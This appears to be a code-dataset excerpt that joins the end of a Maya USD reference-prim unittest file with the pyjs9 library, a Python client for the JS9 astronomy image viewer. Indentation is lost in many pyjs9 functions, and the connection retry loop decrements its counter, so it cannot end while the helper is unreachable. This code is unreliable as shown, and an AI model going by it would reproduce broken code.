        mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
            primPathStr,
            self.mayaSceneStr,
            self.kDefaultNamespace,
            mayaReferencePrimName=kGoodPrimName)
        self.assertFalse(mayaRefPrim.IsValid())
    def testGroup(self):
        '''Test the "Group" options.
        Add a Maya Reference using a group.
        '''
        kDefaultPrimName = mayaRefUtils.defaultMayaReferencePrimName()
        kDefaultVariantSetName = mayaRefUtils.defaultVariantSetName()
        kDefaultVariantName = mayaRefUtils.defaultVariantName()
        # Create another prim to test adding a group prim (with variant).
        primTestGroup = self.stage.DefinePrim('/Test_Group', 'Xform')
        primPathStr = self.proxyShapePathStr + ',/Test_Group'
        mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
            primPathStr,
            self.mayaSceneStr,
            self.kDefaultNamespace,
            groupPrim=('Xform', Kind.Tokens.group),
            variantSet=(kDefaultVariantSetName, kDefaultVariantName))
        # Make sure a group prim was created.
        # Since we did not provide a group name, one will have been auto-generated for us.
        # "namespace" + "RN" + "group"
        primGroup = primTestGroup.GetChild(self.kDefaultNamespace+'RNgroup')
        self.assertTrue(primGroup.IsValid())
        self.assertTrue(primGroup.GetPrimTypeInfo().GetTypeName(), 'Xform')
        model = Usd.ModelAPI(primGroup)
        self.assertEqual(model.GetKind(), Kind.Tokens.group)
        # Make sure the group prim has the variant set and variant.
        self.assertTrue(primGroup.HasVariantSets())
        vset = primGroup.GetVariantSet(kDefaultVariantSetName)
        self.assertTrue(vset.IsValid())
        self.assertEqual(vset.GetName(), kDefaultVariantSetName)
        self.assertTrue(vset.GetVariantNames())
        self.assertTrue(vset.HasAuthoredVariant(kDefaultVariantName))
        self.assertEqual(vset.GetVariantSelection(), kDefaultVariantName)
        # Verify that a Maya Reference prim was created under the new group prim.
        self.assertTrue(mayaRefPrim.IsValid())
        self.assertEqual(str(mayaRefPrim.GetName()), kDefaultPrimName)
        self.assertEqual(mayaRefPrim, primGroup.GetChild(kDefaultPrimName))
        self.assertTrue(mayaRefPrim.GetPrimTypeInfo().GetTypeName(), 'MayaReference')
        # Add another Maya reference with group, but name the group this time and
        # use a 'Scope' prim instead.
        kGroupName = 'NewGroup'
        mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
            primPathStr,
            self.mayaSceneStr,
            self.kDefaultNamespace,
            groupPrim=(kGroupName, 'Scope', Kind.Tokens.group))
        # Make sure a group prim was created and what we named it.
        prim2ndGroup = primTestGroup.GetChild(kGroupName)
        self.assertTrue(prim2ndGroup.IsValid())
        self.assertTrue(prim2ndGroup.GetPrimTypeInfo().GetTypeName(), 'Scope')
        model = Usd.ModelAPI(prim2ndGroup)
        self.assertEqual(model.GetKind(), Kind.Tokens.group)
        # Verify that a Maya Reference prim was created under the new group prim.
        self.assertTrue(mayaRefPrim.IsValid())
        self.assertEqual(str(mayaRefPrim.GetName()), kDefaultPrimName)
        self.assertEqual(mayaRefPrim, prim2ndGroup.GetChild(kDefaultPrimName))
        self.assertTrue(mayaRefPrim.GetPrimTypeInfo().GetTypeName(), 'MayaReference')
        # Adding a group with the same name should produce an error.
        mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
            primPathStr,
            self.mayaSceneStr,
            self.kDefaultNamespace,
            groupPrim=(kGroupName, 'Scope', Kind.Tokens.group))
        self.assertFalse(mayaRefPrim.IsValid())
        # Test an error creating the group prim by disabling permission to edit on the edit target layer.
        editTarget = self.stage.GetEditTarget()
        editLayer = editTarget.GetLayer()
        editLayer.SetPermissionToEdit(False)
        badMayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
            primPathStr,
            self.mayaSceneStr,
            self.kDefaultNamespace,
            groupPrim=('NoGroup', 'Xform', Kind.Tokens.group))
        self.assertFalse(badMayaRefPrim.IsValid())
        # The failed call must not have left a partial group prim behind.
        invalidGroupPrim = primTestGroup.GetChild('NoGroup')
        self.assertFalse(invalidGroupPrim.IsValid())
        editLayer.SetPermissionToEdit(True)
    def testProxyShape(self):
        '''Test adding a Maya Reference directly undereath the proxy shape.
        Add a Maya Reference using the defaults (no group or variant).
        '''
        kDefaultPrimName = mayaRefUtils.defaultMayaReferencePrimName()
        mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
            self.proxyShapePathStr,
            self.mayaSceneStr,
            self.kDefaultNamespace)
        # Verify that a Maya Reference prim was created.
        self.assertTrue(mayaRefPrim.IsValid())
        self.assertEqual(str(mayaRefPrim.GetName()), kDefaultPrimName)
        self.assertTrue(mayaRefPrim.GetPrimTypeInfo().GetTypeName(), 'MayaReference')
        # We should get an error (invalid prim) when adding a Maya reference under
        # the proxy shape when we also add a variant set.
        kDefaultVariantSetName = mayaRefUtils.defaultVariantSetName()
        kDefaultVariantName = mayaRefUtils.defaultVariantName()
        mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
            self.proxyShapePathStr,
            self.mayaSceneStr,
            self.kDefaultNamespace,
            variantSet=(kDefaultVariantSetName, kDefaultVariantName))
        self.assertFalse(mayaRefPrim.IsValid())
# Run the unittest suite when executed directly (e.g. under mayapy).
if __name__ == '__main__':
    unittest.main(verbosity=2)
| 1.96875 | 2 |
pyjs9/__init__.py | ericmandel/pyjs9 | 14 | 12765010 | """
pyjs9.py: connects Python and JS9 via the JS9 (back-end) helper
"""
from __future__ import print_function
import time
import json
import base64
import logging
from traceback import format_exc
from threading import Condition
from io import BytesIO
import requests
# Public API of the package.
__all__ = ['JS9', 'js9Globals']
"""
pyjs9.py connects Python and JS9 via the JS9 (back-end) helper
- The JS9 class constructor connects to a single JS9 instance in a web page.
- The JS9 object supports the JS9 Public API and a shorter command-line syntax.
- See: http://js9.si.edu/js9/help/publicapi.html
- Send/retrieve numpy arrays and astropy (or pyfits) hdulists to/from js9.
- Use python-socketio for fast, persistent connections to the JS9 back-end
"""
# pyjs9 version
__version__ = '3.6'
# try to be a little bit neat with global parameters
js9Globals = {}
js9Globals['version'] = __version__
# what sort of fits verification gets done on SetFITS() output?
# see astropy documentation on write method
js9Globals['output_verify'] = 'ignore'
# retrieve image data from JS9 as an array or as base64 encoded string
# in the early days, base64 seemed to be faster
# js9Globals['retrieveAs'] = 'base64'
# array allows us to deal with larger images
js9Globals['retrieveAs'] = 'array'
# load fits, if available
# js9Globals['fits']: 0 = no FITS support, 1 = astropy, 2 = pyfits >= 2.2
try:
    from astropy.io import fits
    js9Globals['fits'] = 1
except ImportError:
    try:
        import pyfits as fits
        if fits.__version__ >= '2.2':
            js9Globals['fits'] = 2
        else:
            js9Globals['fits'] = 0
    except ImportError:
        js9Globals['fits'] = 0
# load numpy, if available
# js9Globals['numpy']: 1 enables the numpy-dependent conversion helpers below
try:
    import numpy
    js9Globals['numpy'] = 1
except ImportError:
    js9Globals['numpy'] = 0
# load socket.io, if available
# fall back to plain HTML transport when python-socketio is not installed
try:
    import socketio
    logging.info('set socketio transport')
    js9Globals['transport'] = 'socketio'
    js9Globals['wait'] = 10
except ImportError:
    logging.info('no python-socketio, use html transport')
    js9Globals['transport'] = 'html'
    js9Globals['wait'] = 0
# utilities
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.items():
if isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
# numpy-dependent routines
if js9Globals['numpy']:
def _bp2np(bitpix): # pylint: disable=too-many-return-statements
"""
Convert FITS bitpix to numpy datatype
"""
if bitpix == 8:
return numpy.uint8
if bitpix == 16:
return numpy.int16
if bitpix == 32:
return numpy.int32
if bitpix == 64:
return numpy.int64
if bitpix == -32:
return numpy.float32
if bitpix == -64:
return numpy.float64
if bitpix == -16:
return numpy.uint16
raise ValueError('unsupported bitpix: %d' % bitpix)
_NP_TYPE_MAP = (
# pylint: disable=bad-whitespace
(numpy.uint8 , numpy.uint8, ),
(numpy.int8 , numpy.int16, ),
(numpy.uint16 , numpy.uint16, ),
(numpy.int16 , numpy.int16, ),
(numpy.int32 , numpy.int32, ),
(numpy.uint32 , numpy.int64, ),
(numpy.int64 , numpy.int64, ),
(numpy.float16, numpy.float32,),
(numpy.float32, numpy.float32,),
(numpy.float64, numpy.float64,),
)
def _cvt2np(ndarr: numpy.ndarray):
# NOTE cvt2np may be merged into np2bp
dtype = ndarr.dtype
for t in _NP_TYPE_MAP:
if numpy.issubdtype(dtype, t[0]):
return ndarr.astype(t[1])
return ndarr
def _np2bp(dtype): # pylint: disable=too-many-return-statements
"""
Convert numpy datatype to FITS bitpix
"""
if dtype == numpy.uint8:
return 8
if dtype == numpy.int16:
return 16
if dtype == numpy.int32:
return 32
if dtype == numpy.int64:
return 64
if dtype == numpy.float32:
return -32
if dtype == numpy.float64:
return -64
if dtype == numpy.uint16:
return -16
raise ValueError('unsupported dtype: %s' % dtype)
def _bp2py(bitpix): # pylint: disable=too-many-return-statements
"""
Convert FITS bitpix to python datatype
"""
if bitpix == 8:
return 'B'
if bitpix == 16:
return 'h'
if bitpix == 32:
return 'l'
if bitpix == 64:
return 'q'
if bitpix == -32:
return 'f'
if bitpix == -64:
return 'd'
if bitpix == -16:
return 'H'
raise ValueError('unsupported bitpix: %d' % bitpix)
    def _im2np(im):
        """
        Convert GetImageData object to numpy

        *im* is the dict returned by JS9.GetImageData(): must contain
        'width', 'height', 'bitpix' and 'data' keys.  The format of
        'data' depends on js9Globals['retrieveAs']: a flat list of pixel
        values ('array') or a base64-encoded string ('base64').
        Returns a 2-d numpy array of shape (height, width).
        """
        w = int(im['width'])
        h = int(im['height'])
        # depth is fixed at 1: only 2-d images are handled here, so the
        # d > 1 branches below are currently never taken
        d = 1
        bp = int(im['bitpix'])
        dtype = _bp2np(bp)
        # expected byte length of the pixel buffer (abs(bp) bits/pixel)
        dlen = h * w * abs(bp) // 8
        if js9Globals['retrieveAs'] == 'array':
            s = im['data'][0:h*w]
            if d > 1:
                arr = numpy.array(s, dtype=dtype).reshape((d, h, w))
            else:
                arr = numpy.array(s, dtype=dtype).reshape((h, w))
        elif js9Globals['retrieveAs'] == 'base64':
            # decode to raw bytes and truncate to the expected length
            s = base64.decodebytes(im['data'].encode())[0:dlen]
            if d > 1:
                arr = numpy.frombuffer(s, dtype=dtype).reshape((d, h, w))
            else:
                arr = numpy.frombuffer(s, dtype=dtype).reshape((h, w))
        else:
            raise ValueError('unknown retrieveAs type for GetImageData()')
        return arr
class JS9:
"""
The JS9 class supports communication with an instance of JS9 in a web
page, utilizing the JS9 Public API calls as class methods.
JS9's public access library is documented here:
- http://js9.si.edu/js9/help/publicapi.html
In addition, a number of special methods are implemented to facilitate data
access to/from well-known Python objects:
- GetNumpy: retrieve a FITS image or an array into a numpy array
- SetNumpy: send a numpy array to JS9 for display
- GetFITS: retrieve a FITS image into an astropy (or pyfits) HDU list
- SetFITS: send a astropy (or pyfits) HDU list to JS9 for display
"""
def __init__(self, host='http://localhost:2718', id='JS9', maxtries=5, delay=1, debug=False): # pylint: disable=redefined-builtin, too-many-arguments
"""
:param host: host[:port] (def: 'http://localhost:2718')
:param id: the JS9 display id (def: 'JS9')
:rtype: JS9 object connected to a single instance of js9
The JS9() contructor takes its first argument to be the host (and
optional port) on which the back-end js9Helper is running. The default
is 'http://localhost:2718', which generally will be the correct value
for running locally. The default port (2718) will be added if no port
value is found. The string 'http://' will be prefixed to the host if a
URL protocol is not supplied. Thus, to connect to the main JS9 web
site, you can use host='js9.si.edu'.
The second argument is a JS9 display id on the web page. The
default is 'JS9' which is the default JS9 display id. Thus:
>>> JS9 = pyjs9.JS9()
is appropriate for local web pages having only one JS9 display.
"""
self.__dict__['id'] = id
# add default port, if necessary
c = host.rfind(':')
s = host.find('/')
if c <= s:
host += ':2718'
if s < 0:
host = 'http://' + host
self.__dict__['host'] = host
# open socket.io connection, if necessary
if js9Globals['transport'] == 'socketio':
try:
if debug:
self.sockio = socketio.Client(logger=True,
engineio_logger=True)
else:
self.sockio = socketio.Client()
self.sockio.connect(host)
except Exception as e: # pylint: disable=broad-except
logging.warning('socketio connect failed: %s, using html', e)
js9Globals['transport'] = 'html'
self._block_cb = None
# wait for connect be ready, but success doesn't really matter here
tries = 0
while tries < maxtries:
try:
self._alive()
except Exception: # pylint: disable=broad-except
time.sleep(delay)
tries = tries - 1
else:
break
def __setitem__(self, itemname, value):
"""
An internal routine to process some assignments specially
"""
self.__dict__[itemname] = value
if itemname in ('host', 'id',):
self._alive()
    def _alive(self):
        """
        An internal routine to send a test message to the helper

        Sends a round-trip 'alive' message; send() raises if the helper
        is unreachable or reports an error.
        """
        self.send(None, msg='alive')
def sockioCB(self, *args):
"""
Internal routine
"""
logging.debug('socketio callback, args: %s', args)
self.__dict__['sockioResult'] = args[0]
self._block_cb.acquire()
self._block_cb.notify()
self._block_cb.release()
def send(self, obj, msg='msg'):
"""
:obj: dictionary containing command and args keys
:rtype: returned data or info (in format specified by public api)
examples:
>>> js9 = pyjs9.JS9()
>>> js9.send({'cmd': 'GetColormap'})
{u'bias': 0.5, u'colormap': u'cool', u'contrast': 1}
>>> js9.send({'cmd': 'SetColormap', 'args': ['red']})
'OK'
"""
if obj is None:
obj = {}
obj['id'] = self.__dict__['id']
if js9Globals['transport'] == 'html': # pylint: disable=no-else-return
host = self.__dict__['host']
try:
url = requests.post(host + '/' + msg, json=obj)
except IOError as e:
raise IOError('Cannot connect to {0}: {1}'.format(host, e))
urtn = url.text
if 'ERROR:' in urtn:
raise ValueError(urtn)
try:
# TODO: url.json() decode the json for us:
# http://www.python-requests.org/en/latest/user/quickstart/#json-response-content
# res = url.json()
res = json.loads(urtn, object_hook=_decode_dict)
except ValueError: # not json
res = urtn
if type(res) == str:
res = res.strip()
return res
else:
self.__dict__['sockioResult'] = ''
self._block_cb = Condition()
self._block_cb.acquire()
self.sockio.emit('msg', obj, callback=self.sockioCB)
self._block_cb.wait(timeout=js9Globals['wait'])
self._block_cb.release()
# self.sockio.wait_for_callbacks(seconds=js9Globals['wait'])
if self.__dict__['sockioResult'] and \
isinstance(self.__dict__['sockioResult'], str) and \
'ERROR:' in self.__dict__['sockioResult']:
raise ValueError(self.__dict__['sockioResult'])
return self.__dict__['sockioResult']
def close(self):
"""
Close the socketio connection and disconnect from the server
"""
if js9Globals['transport'] == 'socketio':
try:
self.sockio.disconnect()
except Exception as e: # pylint: disable=broad-except
logging.error('socketio close failed: %s', e)
if js9Globals['fits']:
        def GetFITS(self):
            """
            :rtype: fits hdulist
            To read FITS data or a raw array from js9 into fits, use the
            'GetFITS' method. It takes no args and returns an hdu list::
              >>> hdul = j.GetFITS()
              >>> hdul.info()
              Filename: StringIO.StringIO
              No.    Name         Type      Cards   Dimensions   Format
              0    PRIMARY     PrimaryHDU      24  (1024, 1024)  float32
              >>> data = hdul[0].data
              >>> data.shape
              (1024, 1024)
            """
            # get image data from JS9
            im = self.GetImageData(js9Globals['retrieveAs'])
            # if the image is too large, we can get back an empty string
            if im == '':
                raise ValueError('GetImageData failed: image too large for Python transport?')
            # convert to numpy
            arr = _im2np(im)
            # add fits cards
            # create FITS primary hdu from numpy array
            hdu = fits.PrimaryHDU(arr)
            hdulist = fits.HDUList([hdu])
            return hdulist
        def SetFITS(self, hdul, name=None):
            """
            :param hdul: fits hdulist
            :param name: fits file or object name (used as id)
            :raises ValueError: if *hdul* is not an HDUList of the
                available FITS implementation
            After manipulating or otherwise modifying a fits hdulist (or
            making a new one), you can display it in js9 using the 'SetFITS'
            method, which takes the hdulist as its sole argument::
              >>> j.SetFITS(nhdul)
            Note that this routine creates a new image in the JS9 display. If
            you want to update the current image, use RefreshImage. In that
            case, the hdul's numpy array must be converted to a list:
              >>>> j.RefreshImage(hdul[0].data.tolist())
            """
            if not js9Globals['fits']:
                raise ValueError('SetFITS not defined (fits not found)')
            if not isinstance(hdul, fits.HDUList):
                # js9Globals['fits'] == 1 means astropy, 2 means pyfits
                if js9Globals['fits'] == 1:
                    raise ValueError('requires astropy.HDUList as input')
                raise ValueError('requires pyfits.HDUList as input')
            # in-memory string
            memstr = BytesIO()
            # write fits to memory string
            hdul.writeto(memstr, output_verify=js9Globals['output_verify'])
            # get memory string as an encoded string
            encstr = base64.b64encode(memstr.getvalue()).decode()
            # set up JS9 options
            opts = {}
            if name:
                opts['filename'] = name
            # send encoded file to JS9 for display
            got = self.Load(encstr, opts)
            # finished with memory string
            memstr.close()
            return got
else:
        @staticmethod
        def GetFITS():
            """
            This method is not defined because fits is not installed.
            """
            raise ValueError('GetFITS not defined (astropy.io.fits not found)')
        @staticmethod
        def SetFITS():
            """
            This method is not defined because fits is not installed.
            """
            raise ValueError('SetFITS not defined (astropy.io.fits not found)')
if js9Globals['numpy']:
        def GetNumpy(self):
            """
            :rtype: numpy array
            :raises ValueError: if the image data could not be retrieved
            To read a FITS file or an array from js9 into a numpy array, use
            the 'GetNumpy' method. It takes no arguments and returns the
            np array::
              >>> j.get('file')
              '/home/eric/data/casa.fits[EVENTS]'
              >>> arr = j.GetNumpy()
              >>> arr.shape
              (1024, 1024)
              >>> arr.dtype
              dtype('float32')
              >>> arr.max()
              51.0
            """
            # get image data from JS9
            im = self.GetImageData(js9Globals['retrieveAs'])
            # if the image is too large, we can get back an empty string
            if im == '':
                raise ValueError('GetImageData failed: image too large for Python transport?')
            # convert to numpy
            arr = _im2np(im)
            return arr
def SetNumpy(self, arr, filename=None, dtype=None):
"""
:param arr: numpy array
:param name: file or object name (used as id)
:param dtype: data type into which to convert array before sending
After manipulating or otherwise modifying a numpy array (or making
a new one), you can display it in js9 using the 'SetNumpy' method,
which takes the array as its first argument::
>>> j.SetNumpy(arr)
An optional second argument specifies a datatype into which the
array will be converted before being sent to js9. This is
important in the case where the array has datatype np.uint64,
which is not recognized by js9::
>>> j.SetNumpy(arru64)
...
ValueError: uint64 is unsupported by JS9 (or FITS)
>>> j.SetNumpy(arru64,dtype=np.float64)
Also note that np.int8 is sent to js9 as int16 data, np.uint32 is
sent as int64 data, and np.float16 is sent as float32 data.
Note that this routine creates a new image in the JS9 display. If
you want to update the current image, use RefreshImage. In that
case, the numpy array must be converted to a list:
>>>> j.RefreshImage(arr.tolist())
"""
if not isinstance(arr, numpy.ndarray):
raise ValueError('requires numpy.ndarray as input')
if dtype and dtype != arr.dtype:
narr = arr.astype(dtype)
else:
narr = _cvt2np(arr)
if not narr.flags['C_CONTIGUOUS']:
narr = numpy.ascontiguousarray(narr)
# parameters to pass back to JS9
bp = _np2bp(narr.dtype)
(h, w) = narr.shape
dmin = narr.min().tolist()
dmax = narr.max().tolist()
# base64-encode numpy array in native format
encarr = base64.b64encode(narr.tostring()).decode()
# create object to send to JS9 containing encoded array
hdu = {'naxis': 2, 'naxis1': w, 'naxis2': h, 'bitpix': bp,
'dmin': dmin, 'dmax': dmax, 'encoding': 'base64',
'image': encarr}
if filename:
hdu['filename'] = filename
# send encoded file to JS9 for display
return self.Load(hdu)
else:
        @staticmethod
        def GetNumpy():
            """
            This method is not defined because numpy is not installed.
            """
            raise ValueError('GetNumpy not defined (numpy not found)')
        @staticmethod
        def SetNumpy():
            """
            This method is not defined because numpy is not installed.
            """
            raise ValueError('SetNumpy not defined (numpy not found)')
    def Load(self, *args):
        """
        Load an image into JS9
        call:
        JS9.Load(url, opts)
        where:
        -  url: url, fits object, or in-memory FITS
        -  opts: object containing image parameters
        NB: In Python, you probably want to call JS9.SetFITS() or
        JS9.SetNumpy() to load a local file into JS9.
        Load a FITS file or a PNG representation file into JS9. Note that
        a relative URL is relative to the JS9 install directory.
        You also can pass an in-memory buffer containing a FITS file, or a
        string containing a base64-encoded FITS file.
        Finally, you can pass a fits object containing the following
        properties:
        -  naxis: number of axes in the image
        -  axis: array of image dimensions for each axis or ...
        -  naxis[n] image dimensions of each axis (naxis1, naxis2, ...)
        -  bitpix: FITS bitpix value
        -  head: object containing header keywords as properties
        -  image: list containing image pixels
        -  dmin: data min (optional)
        -  dmax: data max (optional)
        To override default image parameters, pass the image opts argument:
          >>> j.Load('png/m13.png', {'scale':'linear', 'colormap':'sls'})
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'Load', 'args': args})
    def LoadWindow(self, *args):
        """
        Load an image into a light window or a new (separate) window
        call:
        JS9.LoadWindow(url, opts, type, html, winopts)
        where:
        -  url: remote URL image to load
        -  opts: object containing image parameters
        -  type: "light" or "new"
        -  html: html for the new page (def: menubar, image, colorbar)
        -  winopts: for "light", optional dhtml window options
        returns:
        -  id: the id of the JS9 display div
        This routine will load an image into a light-weight window or an
        entirely new window. The url and opts arguments are identical to
        the standard JS9.Load() call, except that opts can contain:
        -  id: string specifying the id of the JS9 display being created:
           if no id is specified, a unique id is generated
        -  clone: the id of a display to clone when creating a light window:
           the menubar and colorbar will be created if and only if they are
           present in the cloned display
        The type argument determines whether to create a light-weight
        window ("light", the default) or a new separate window ("new").
        You can use the html argument to supply different web page elements
        for the window. Furthermore, if you create a light window, a default
        set of DynamicDrive dhtmlwindow parameters will be used to make the
        window the correct size for the default html:
        "width=512px,height=542px,center=1,resize=1,scrolling=1"
        You can supply your own parameters for the new dhtmlwindow using the
        winOpts argument. See the Dynamic Drive web site:
        http://www.dynamicdrive.com/dynamicindex8/dhtmlwindow/index.htm
        for more information about their light-weight window.
        To create a new light window without loading an image, use:
          >>>> JS9.LoadWindow("", "", "light");
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'LoadWindow', 'args': args})
    def LoadProxy(self, *args):
        """
        Load an FITS image link into JS9 using a proxy server
        call:
        JS9.LoadProxy(url, opts)
        where:
        -  url: remote URL link to load
        -  opts: object containing image parameters
        Load a FITS file specified by an arbitrary URL into JS9 using
        the JS9 back-end helper as a proxy server. Not all back-end
        servers support the proxy functionality. The main JS9 web
        site does support proxy service, and can be used to view
        images from arbitrary URLs.
        The JS9.LoadProxy() call takes a URL as its first argument.
        This URL will be retrieved using curl or wget and stored on the
        back-end server in a directory specifically tied to the web page.
        (The directory and its contents will be deleted when the page is
        unloaded.) JS9 then will load the file from this directory.
        Note that since the file resides on the back-end server, all
        back-end analysis defined on that server is available.
        To override default image parameters, pass the image opts argument:
          >>> j.LoadProxy('http://hea-www.cfa.harvard.edu/~eric/coma.fits',
                          {'scale':'linear', 'colormap':'sls'})
        If an onload callback function is specified in opts, it will be called
        after the image is loaded:
          >>> j.LoadProxy('http://hea-www.cfa.harvard.edu/~eric/coma.fits',
                          {'scale': 'linear', 'onload': func})
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'LoadProxy', 'args': args})
    def GetStatus(self, *args):
        """
        Get Processing Status
        call:
        status = JS9.GetStatus(type, id)
        where:
        -  type: the type of status
        -  id: the id of the file that was loaded into JS9
        returns:
        -  status: status of the processing
        This routine returns the status of one of the following specified
        asynchronous processing types: "Load", "CreateMosaic",
        "DisplaySection", "LoadCatalog", "LoadRegions", "ReprojectData",
        "RotateData", "RunAnalysis".
        A status of "complete" means that the image is fully processed. Other
        statuses include:
        -  processing: the image is being processed
        -  loading: the image is in process of loading ("Load" only)
        -  error: image did not load due to an error
        -  other: another image is loaded into this display
        -  none: no image is loaded into this display
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'GetStatus', 'args': args})
    def GetLoadStatus(self, *args):
        """
        Get Load Status
        call:
        status = JS9.GetLoadStatus(id)
        where:
        -  id: the id of the file that was loaded into JS9
        returns:
        -  status: status of the load
        This routine returns the status of the load of this image.
        Provided for backward compatibility, it simply calls the more general
        GetStatus() routine with "Load" as the first argument.
        A status of 'complete' means that the image is fully loaded. Other
        statuses include:
        -  loading: the image is in process of loading
        -  error: image did not load due to an error
        -  other: another image is loaded into this display
        -  none: no image is loaded into this display
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'GetLoadStatus', 'args': args})
    def DisplayImage(self, *args):
        """
        Display an image
        call:
        JS9.DisplayImage(step)
        where:
        -  step: starting step to take when displaying the image
        The display steps are: "colors" (remake colors when cmap has changed),
        "scaled" (rescale data values), "primary" (convert scaled data values
        to color values), and "display" (write color values to the web page).
        The default step is "primary", which displays the image without
        recalculating color data, scaled data, etc. This generally is what you
        want, unless you have changed parameter(s) used in a prior step.
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'DisplayImage', 'args': args})
    def RefreshImage(self, *args):
        """
        Re-read the image data and re-display
        call:
        JS9.RefreshImage(input)
        where:
        -  input: python list
        This routine can be used, for example, in laboratory settings where
        data is being gathered in real-time and the JS9 display needs to be
        refreshed periodically. The first input argument can be one of the
        following:
        -  a list containing image pixels (for numpy, use tolist() to convert)
        -  a two-dimensional list containing image pixels
        -  a dictionary containing a required image property and any of the
           following optional properties:
           -  naxis: number of axes in the image
           -  axis: array of image dimensions for each axis or ...
           -  naxis[n] image dimensions of each axis (naxis1, naxis2, ...)
           -  bitpix: FITS bitpix value
           -  head: object containing header keywords as properties
           -  dmin: data min (optional)
           -  dmax: data max (optional)
        When passing an object as input, the required image property that
        contains the image data can be a list or a list of lists containing
        data. It also can contain a base64-encoded string containing a list.
        This latter can be useful when calling JS9.RefreshImage() via HTTP.
        Ordinarily, when refreshing an image, there is no need to specify the
        optional axis, bitpix, or header properties. But note that you actually
        can change these values on the fly, and JS9 will process the new data
        correctly. Also, if you do not pass dmin or dmax, they will be
        calculated by JS9.
        Note that you can pass a complete FITS file to this routine. It will be
        passed to the underlying FITS-handler before being displayed. Thus,
        processing time is slightly greater than if you pass the image data
        directly.
        The main difference between JS9.RefreshImage() and JS9.Load() is
        that the former updates the data into an existing image, while the
        latter adds a completely new image to the display.
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'RefreshImage', 'args': args})
    def CloseImage(self, *args):
        """
        Clear the image from the display and mark resources for release
        call:
        JS9.CloseImage()
        Each loaded image claims a non-trivial amount of memory from a finite
        amount of browser heap space. For example, the default 32-bit version
        of Google Chrome has a memory limit of approximately 500Mb. If you are
        finished viewing an image, closing it tells the browser that the
        image's memory can be freed. In principle, this can help reduce
        overall memory usage as successive images are loaded and discarded.
        Note, however, that closing an image only provides a hint to the
        browser, since this sort of garbage collection is not directly
        accessible to JavaScript programming.
        Some day, all browsers will support full 64-bit addressing and this
        problem will go away ...
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'CloseImage', 'args': args})
    def GetImageData(self, *args):
        """Get image data and auxiliary info for the specified image
        call:
        imdata = JS9.GetImageData(dflag)
        where:
        -  dflag: specifies whether the data should also be returned
        returns:
        -  imdata: image data object
        NB: In Python, you probably want to call JS9.GetFITS() or
        JS9.GetNumpy() to retrieve an image.
        The image data object contains the following information:
        -  id: the id of the file that was loaded into JS9
        -  file: the file or URL that was loaded into JS9
        -  fits: the FITS file associated with this image
        -  source: 'fits' if a FITS file was downloaded, 'fits2png' if a
           representation file was retrieved
        -  imtab: 'image' for FITS images and png files, 'table' for FITS
           binary tables
        -  width: x dimension of image
        -  height: y dimension of image
        -  bitpix: FITS bits/pixel of each image element (8 for unsigned
           char, 16, 32 for signed integer, -32 or -64 for float)
        -  header: object containing FITS header values
        -  data: buffer containing raw data values
        This call can return raw data for subsequent use in local analysis
        tasks. The format of the returned data depends on the exact value of
        dflag. If dflag is the boolean value true, an HTML5 typed array
        is returned, which translates into a dictionary of pixels values in
        Python. While typed arrays are more efficient than ordinary JavaScript
        arrays, this is almost certainly not what you want in Python.
        If dflag is the string 'array', a Python list of pixel values is
        returned. Intuitively, this would seem to be what is wanted, but ... it
        appears that base64-encoded strings are transferred more quickly
        through the JS9 helper than are binary data.
        If dflag is the string 'base64', a base64-encoded string is returned.
        Oddly, this seems to be the fastest method of transferring
        data via socket.io to an external process such as Python, and, in
        fact, is the method used by the pyjs9 numpy and fits routines.
        The file value can be a FITS file or a representation PNG file. The
        fits value will be the path of the FITS file associated with this
        image. For a presentation PNG file, the path generally will be relative
        to the JS9 install directory. For a normal FITS file, the path usually
        is an absolute path to the FITS file.
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'GetImageData', 'args': args})
    def GetDisplayData(self, *args):
        """
        Get image data for all images loaded into the specified display
        call:
        imarr = JS9.GetDisplayData()
        returns:
        -  imarr: array of image data objects
        The JS9.GetDisplayData() routine returns an array of image data
        objects, one for each images loaded into the specified display.
        That is, it returns the same type of information as JS9.GetImageData(),
        but does so for each image associated with the display, not just the
        current image.
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'GetDisplayData', 'args': args})
    def DisplayPlugin(self, *args):
        """
        Display plugin in a light window
        call:
        JS9.DisplayPlugin(plugin)
        where:
        -  plugin: name of the plugin
        Toggle the light-window display of the named plugin, as is done
        by the View and Analysis menus. That is, if the plugin is not
        visible, make it visible. If the plugin is visible, hide it.
        You can supply the full class and plugin name or just the name, using
        exact case or lower case, e.g.:
        -  JS9Panner or panner
        -  JS9Magnifier or magnifier
        -  JS9Info or info
        -  JS9Console or console
        -  DataSourcesArchivesCatalogs or archivescatalogs
        -  FitsBinning or binning
        -  ImExamEncEnergy or encenergy
        -  ImExamPxTabl or pxtabl
        -  ImExamRadialProj or radialproj
        -  ImExamHistogram or histogram
        -  ImExamRegionStats or regionstats
        -  ImExamXProj or xproj
        -  ImExamYProj or yproj
        -  ImExam3dPlot or 3dplot
        -  ImExamContours or contours
        As with plugins in the View and Analysis menus, this routine does
        nothing if the plugin is explicitly defined on the web page.
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'DisplayPlugin', 'args': args})
    def DisplayExtension(self, *args):
        """
        Display an extension from a multi-extension FITS file
        call:
